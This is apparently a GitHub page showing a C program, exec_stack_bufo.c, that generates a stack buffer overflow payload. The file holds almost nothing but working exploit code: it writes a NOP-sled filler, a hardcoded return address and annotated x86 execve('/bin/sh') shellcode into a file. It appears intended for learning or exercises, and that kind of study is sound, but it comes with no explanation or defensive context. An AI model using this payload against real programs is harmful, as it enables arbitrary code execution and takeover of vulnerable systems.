-
Notifications
You must be signed in to change notification settings - Fork 0
/
exec_stack_bufo.c
50 lines (45 loc) · 1.43 KB
/
exec_stack_bufo.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#include <stdio.h>
#include <string.h>
#define FILENAME "shellcode"
#define BUF_SIZE 64 + 16 // 16 bytes to skip other locals and SEH handlers
char shellcode[] =
{
// http://sparksandflames.com/files/x86InstructionChart.html enjoy
"\x80\xf6\xff\xbf" // return address
"\xeb\x1f" // jmp 0x1f
"\x5e" // pop esi
"\x89\x76\x08" // mov [esi + 0x8], esi
"\x31\xc0" // xor eax, eax
"\x88\x46\x07" // mov byte ptr [esi+0x7], eax
"\x89\x46\x0c" // mov [esi + 0xc], eax
"\xb0\x0b" // mov al, 0xb
"\x89\xf3" // mov ebx, esi
"\x8d\x4e\x08" // lea ecx, dword ptr [esi + 0x8]
"\x8d\x56\x0c" // lea edx, dword ptr [esi + 0xc]
"\xcd\x80" // int 80
"\x31\xdb" // xor ebx, ebx
"\x89\xd8" // mov eax, ebx
"\x40" // inc eax
"\xcd\x80" // int 80
"\xe8\xdc\xff\xff\xff" // call -0x24
"/bin/sh"
};
char filler = '\x90';
int main()
{
FILE *fp = fopen(FILENAME, "w");
char buf[BUF_SIZE];
printf("sh-sz=%d fill-sz=%d\n", sizeof(shellcode), BUF_SIZE - sizeof(shellcode));
if(fp)
{
memset(buf, filler, BUF_SIZE);
fwrite(buf, BUF_SIZE, 1, fp);
fwrite(shellcode, sizeof(shellcode) - 1, 1, fp);
fclose(fp);
}
else
{
printf("could not open file\n");
}
return 0;
}